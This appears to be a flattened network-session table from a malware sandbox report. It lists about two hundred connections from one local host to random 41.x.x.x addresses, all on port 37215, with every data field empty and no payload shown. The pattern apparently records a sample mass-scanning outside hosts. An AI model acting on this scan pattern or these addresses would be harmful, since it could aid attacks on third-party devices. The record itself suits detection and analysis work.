                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22169192.168.2.153643641.71.100.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22170192.168.2.153563041.216.233.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22171192.168.2.155175641.144.192.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22172192.168.2.154332641.112.46.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22173192.168.2.154351041.207.99.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22174192.168.2.154233241.78.241.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22175192.168.2.155068241.78.152.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22176192.168.2.153992041.222.207.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22177192.168.2.153927441.247.20.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22178192.168.2.155178041.34.35.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22179192.168.2.154249641.184.55.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22180192.168.2.154184241.220.237.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22181192.168.2.155086641.117.10.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22182192.168.2.154780441.44.84.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22183192.168.2.155271441.0.114.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22184192.168.2.153502241.70.96.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22185192.168.2.155565841.97.152.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22186192.168.2.153327641.63.17.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22187192.168.2.154517041.16.14.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22188192.168.2.153475841.253.212.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22189192.168.2.154426041.231.147.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22190192.168.2.155241241.63.76.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22191192.168.2.154070641.193.119.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22192192.168.2.155808241.253.250.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22193192.168.2.155413441.108.227.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22194192.168.2.155457041.186.75.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22195192.168.2.155321041.254.129.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22196192.168.2.153657041.248.197.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22197192.168.2.155192441.181.240.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22198192.168.2.155471041.124.183.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22199192.168.2.154505641.17.62.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22200192.168.2.155335041.95.169.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22201192.168.2.154000641.74.100.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22202192.168.2.154024241.137.197.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22203192.168.2.155071241.172.232.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22204192.168.2.153710641.41.123.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22205192.168.2.153766441.104.6.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22206192.168.2.155181241.127.155.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22207192.168.2.154795841.254.100.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22208192.168.2.153942641.144.177.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22209192.168.2.154408441.27.251.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22210192.168.2.154321641.184.124.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22211192.168.2.153477841.24.24.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22212192.168.2.153799841.7.159.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22213192.168.2.155905641.217.49.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22214192.168.2.154946641.74.253.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22215192.168.2.154513441.227.59.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22216192.168.2.153604441.105.154.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22217192.168.2.154182641.115.149.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22218192.168.2.154474841.196.128.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22219192.168.2.154604041.141.7.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22220192.168.2.155833041.147.119.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22221192.168.2.153967441.103.159.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22222192.168.2.153365441.197.42.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22223192.168.2.154965241.133.95.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22224192.168.2.153405441.232.72.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22225192.168.2.154424241.176.82.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22226192.168.2.153609241.1.225.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22227192.168.2.155033041.84.242.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22228192.168.2.153477241.11.255.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22229192.168.2.153630641.23.96.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22230192.168.2.154116441.131.21.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22231192.168.2.154658641.6.28.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22232192.168.2.153910641.10.188.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22233192.168.2.153461241.7.119.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22234192.168.2.155437441.11.73.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22235192.168.2.154218641.71.182.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22236192.168.2.153885641.244.151.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22237192.168.2.153594641.129.190.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22238192.168.2.154643841.210.198.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22239192.168.2.154377041.211.18.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22240192.168.2.155627641.92.243.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22241192.168.2.154521041.61.100.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22242192.168.2.155754241.149.171.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22243192.168.2.154712241.91.249.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22244192.168.2.155458841.229.161.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22245192.168.2.155018641.84.104.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22246192.168.2.154210841.194.56.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22247192.168.2.155238041.190.6.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22248192.168.2.155110441.95.167.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22249192.168.2.153674241.93.148.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22250192.168.2.154144041.16.106.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22251192.168.2.155366641.78.136.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22252192.168.2.154756041.106.174.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22253192.168.2.155540241.26.83.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22254192.168.2.154714641.253.251.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22255192.168.2.155676241.192.2.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22256192.168.2.154844641.106.147.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22257192.168.2.153817441.12.137.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22258192.168.2.154020241.55.46.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22259192.168.2.155809041.188.48.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22260192.168.2.155316041.1.203.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22261192.168.2.153993041.67.126.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22262192.168.2.155172041.133.210.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22263192.168.2.155214441.150.120.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22264192.168.2.155568041.227.4.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22265192.168.2.155675841.62.55.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22266192.168.2.155269841.194.218.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22267192.168.2.154724441.240.241.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22268192.168.2.154741441.14.38.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22269192.168.2.154732641.106.202.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22270192.168.2.155109641.233.43.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22271192.168.2.153549441.121.203.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22272192.168.2.154490241.186.14.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22273192.168.2.154842241.224.128.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22274192.168.2.155732041.27.79.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22275192.168.2.154324641.73.6.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22276192.168.2.153317441.3.231.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22277192.168.2.154820241.152.61.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22278192.168.2.153695041.209.69.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22279192.168.2.155227641.93.235.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22280192.168.2.155815641.131.49.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22281192.168.2.155181041.93.87.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22282192.168.2.154017241.234.163.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22283192.168.2.155956841.167.62.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22284192.168.2.155430241.12.5.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22285192.168.2.155032241.174.229.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22286192.168.2.155885241.211.96.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22287192.168.2.154260241.248.229.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22288192.168.2.155444841.135.168.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22289192.168.2.154034441.19.191.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22290192.168.2.155309641.74.15.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22291192.168.2.153376241.103.66.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22292192.168.2.153628041.51.149.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22293192.168.2.153512041.0.27.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22294192.168.2.154940041.164.124.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22295192.168.2.155060441.168.117.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22296192.168.2.155705241.227.90.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22297192.168.2.155696841.163.123.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22298192.168.2.154946641.27.105.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22299192.168.2.153413041.9.105.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22300192.168.2.155766641.121.165.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22301192.168.2.154331641.55.17.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22302192.168.2.155628841.7.35.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22303192.168.2.154292241.95.209.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22304192.168.2.155086641.47.219.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22305192.168.2.154051241.70.72.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22306192.168.2.154129241.10.190.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22307192.168.2.153353441.15.190.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22308192.168.2.154101841.114.184.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22309192.168.2.155610841.124.11.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22310192.168.2.155124441.42.103.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22311192.168.2.154503041.28.81.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22312192.168.2.154617841.121.48.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22313192.168.2.153319841.49.33.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22314192.168.2.154886241.100.119.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22315192.168.2.155547841.180.232.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22316192.168.2.154422441.158.169.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22317192.168.2.154518441.103.132.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22318192.168.2.155724841.146.222.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22319192.168.2.155906241.210.10.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22320192.168.2.155977641.221.148.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22321192.168.2.153574041.143.189.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22322192.168.2.155828441.80.50.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22323192.168.2.155577441.225.247.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22324192.168.2.155819241.168.87.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22325192.168.2.155502241.159.227.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22326192.168.2.155354241.57.91.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22327192.168.2.154264041.91.169.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22328192.168.2.154710841.221.89.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22329192.168.2.153863041.37.246.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22330192.168.2.154835641.20.143.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22331192.168.2.155081841.225.15.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22332192.168.2.153824241.88.27.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22333192.168.2.153727841.150.77.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22334192.168.2.154775641.162.110.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22335192.168.2.154620641.181.190.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22336192.168.2.153861441.45.148.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22337192.168.2.155226041.61.207.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22338192.168.2.153414241.144.77.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22339192.168.2.153572241.188.241.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22340192.168.2.155922641.191.43.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22341192.168.2.153780041.245.134.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22342192.168.2.153900841.246.157.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22343192.168.2.154501841.242.95.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22344192.168.2.154249641.161.35.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22345192.168.2.153350441.132.133.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22346192.168.2.154850441.113.54.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22347192.168.2.156017841.186.149.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22348192.168.2.154499441.212.229.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22349192.168.2.153960241.46.101.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22350192.168.2.153736641.52.204.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22351192.168.2.154610841.158.211.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22352192.168.2.154059441.82.94.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22353192.168.2.155723841.225.4.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22354192.168.2.154837441.238.245.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22355192.168.2.155970241.90.211.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22356192.168.2.153564841.160.185.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22357192.168.2.154191041.62.240.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22358192.168.2.155696841.11.39.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22359192.168.2.154364241.190.202.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22360192.168.2.155473241.38.16.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22361192.168.2.154285241.245.189.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22362192.168.2.153608641.125.172.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22363192.168.2.155775441.213.28.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22364192.168.2.153991441.255.106.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22365192.168.2.155247841.108.214.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22366192.168.2.154075441.62.177.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22367192.168.2.154373041.81.252.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22368192.168.2.153995641.173.234.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22369192.168.2.155168841.174.17.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22370192.168.2.154727641.103.189.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
